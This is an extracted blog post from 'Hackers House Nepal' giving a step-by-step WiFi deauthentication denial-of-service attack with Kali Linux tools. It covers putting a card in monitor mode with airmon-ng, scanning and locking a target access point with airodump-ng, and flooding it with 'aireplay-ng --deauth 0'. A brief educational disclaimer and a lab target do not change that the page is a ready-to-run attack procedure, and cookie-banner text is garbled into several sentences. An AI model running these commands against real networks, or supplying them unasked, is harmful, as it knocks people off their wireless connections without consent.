You are on page 1of 9

Hackers House Nepal

(Step by Step) DoS attack on Router (Wireless


Network Wifi)
on
January 15, 2021

Prepared by : Amit Giri

Disclaimer : Extremely only for educational purpose. (In this tutorial,


I will show how the DoS attack can be performed step-by-step. This
tutorial is only for education purpose, all the demonstrations

performed in our own lab. Use at your own risk!!)

Title : DoS attack on Router (Wireless Network


Wifi)

Step1: Find WiFi Interface Card

Check the name of your wifi interface card (wlan0/1/2...). Open the
terminal window in (Kali)Linux system and type the following

command:-

This site uses cookies from Google to deliver its services and to analyse traffic.
sudo
Your iwconfig
IP address and user agent are shared with Google, together with
performance and security metrics, to ensure quality of service, generate usage
Chooseand
statistics one
toto put into
detect monitorabuse.
and address mode. In my case, "wlan1" is my wifi

card or interface name to be operating


LEARN MOREin monitor
OK mode.
Hackers House Nepal

Step2: Kill Processes

Some processes need to kill before putting the card in monitor mode

because that could cause trouble. Type the following command:-

sudo airmon-ng check kill

Step3: Enable Monitor Mode


This site uses cookies from Google to deliver its services and to analyse traffic.
Your IP address and user agent are shared with Google, together with
Put your WiFi card in Monitor Mode. Type the following command:-
performance and security metrics, to ensure quality of service, generate usage
statistics and to detect and address abuse.
sudo airmon-ng start wlan1
LEARN MORE OK
//Here "wlan1" is my wifi card, choose your own and replace it with
Hackers House Nepal
your own wifi card (wlan0, wlan1, wlan2...).

Step4: Scan WiFi Networks

In this step, I'm going to scan Wifi networks available in my range.


Type the following command:-

sudo airodump-ng [name of your wireless interface]

//Here "wlan1" is the name of my wifi card. After putting the card into

monitor mode "wlan1" is converted into "wlan1mon" but In my case,


"wlan1" is the name of my wireless card as well as monitor mode

interface. In other cases, you can have "wlan1mon".

This site uses cookies from Google to deliver its services and to analyse traffic.
Here
Your you canand
IP address see user
all the wifiare
agent networks available
shared with intogether
Google, my range.
withAfter you
performance and security
find the target metrics,
you wanna to ensure
perform DoSquality
PressofCtrl+c
service,
to generate usage
stop scanning
statistics and to detect and address abuse.
the wifi networks. 
LEARN MORE OK
Hackers House Nepal

Step5: Lock The Target

Each WiFi network has a channel number and unique bssid(mac

address of the router). In the step, I'm going to lock the target which

I'm gonna perform a DoS attack. I choose "Test BuZz" as my target

which is an access point I have configured for testing purposes. Type

the following command:-

sudo airodump-ng --bssid [BSSID] -c [channel_number] [name of

wireless interface]

// eg: sudo airodump-ng --bssid (target bssid value) -c 11 wlan1

This site uses cookies from Google to deliver its services and to analyse traffic.
Your
As IP
youaddress and
can see user
the agent
target arebeen
has shared with Google, together with
locked.
performance and security metrics, to ensure quality of service, generate usage
statistics and to detect and address abuse.

LEARN MORE OK
Hackers House Nepal

Now let's perform the DoS attack.

Step6: Attack Begin

This is the final step where you can perform the DoS attack to the

target you want. Open another terminal window and type the

following command:-

sudo aireplay-ng --deauth 0 -a [BSSID] [name of the wireless


inteface]

//Here, zero(0) is represents a deathentication attack and -a is the

bssid of the wifi. eg: sudo aireplay-ng --deauth 0 -a (target bssid

here) wlan1

This site uses cookies from Google to deliver its services and to analyse traffic.
Your IP address and user agent are shared with Google, together with
performance
As you canand security
see, We can metrics, to ensure
successfully quality a
perform ofDoS
service, generate
attack on theusage
statistics and to detect and address abuse.
targeted WiFi network.
LEARN MORE OK
Hackers House Nepal

BLOGS
ETHICAL HACKING TUTORIALS
HACKING TOOLS

PENETRATION TESTING TUTORIAL

Enter your comment...

This site uses cookies from Google to deliver its services and to analyse traffic.
Your IP address and user agent are shared with Google, together with
performance and security metrics, to ensure quality of service, generate usage
statistics and to detect and address abuse.

LEARN MORE OK
Featured Clicks
Hackers
EthicalHouse Nepal
Hacking Workshop 2019
Kali Linux Mini Course
Cyber Security Tools for 2019
TOR in Kali Linux

Popular Posts

(Step by Step) WIFITE - WiFi Hacking & Penetration Testing Tool

Prepared by : Amit Giri Disclaimer : In this tutorial, I will automate the
wireless cracking process using Wifite step-by-step. This tutorial is only
for education purpose, all the demonstrations performed in our own lab.
Use at your own risk!! Wifite is a tool to audit WEP or WPA encrypted …

The Lazy Script : Wifi Hacking and Penetration Testing Tool


This site uses cookies from Google to deliver its services and to analyse traffic.
Your IP Note : Thisand
address is only
userforagent
educational purpose.
are shared withLazy Scripttogether
Google, automates process
with
involved
performance andin security
Wifi Penetration
metrics,Testing and quality
to ensure Hacking.ofAnd script generate
service, is for Kali usage
Linux
statistics andoperating
to detectsystem. How toabuse.
and address install : -  Be root user. - Commands :
apt-get update git clone https://github.com/arismelachroinos/lscript.git …
LEARN MORE OK
Hackers House Nepal

Install TOR in Kali Linux | Step by Step Guide

Install TOR in Kali Linux | Step by Step Guide Note : Beginners may find
article complex, so follow article and image together for clear concept .
This content is prepared for my students of Ethical Hacking Workshop ,
where I want my student to become more familiar with : terminal, …

Digital Forensics 0x1a : Intro & FTK Imager Lab [Step by Step Guide]

Prepared by : Bijay Acharya Our FB Page : @hackershouse.nepal Our


Twitter : @hackershousenp Digital Forensics deals with finding out details
on who was responsible for cyber crime activity, breach of systems or
intrusions. Process includes getting digital devices from crime scenes and…

This site uses cookies from Google to deliver its services and to analyse traffic.
Your IP address and user agent are shared with Google, together with
Disclaimer
performance and security metrics, to ensure quality of service, generate usage
statistics and to detect and address abuse.
Everything shared in this site is just for educational purpose.
LEARN MORE OK
Powered by Blogger

Powered by Blogger

Hackers House Nepal

This site uses cookies from Google to deliver its services and to analyse traffic.
Your IP address and user agent are shared with Google, together with
performance and security metrics, to ensure quality of service, generate usage
statistics and to detect and address abuse.

LEARN MORE OK

You might also like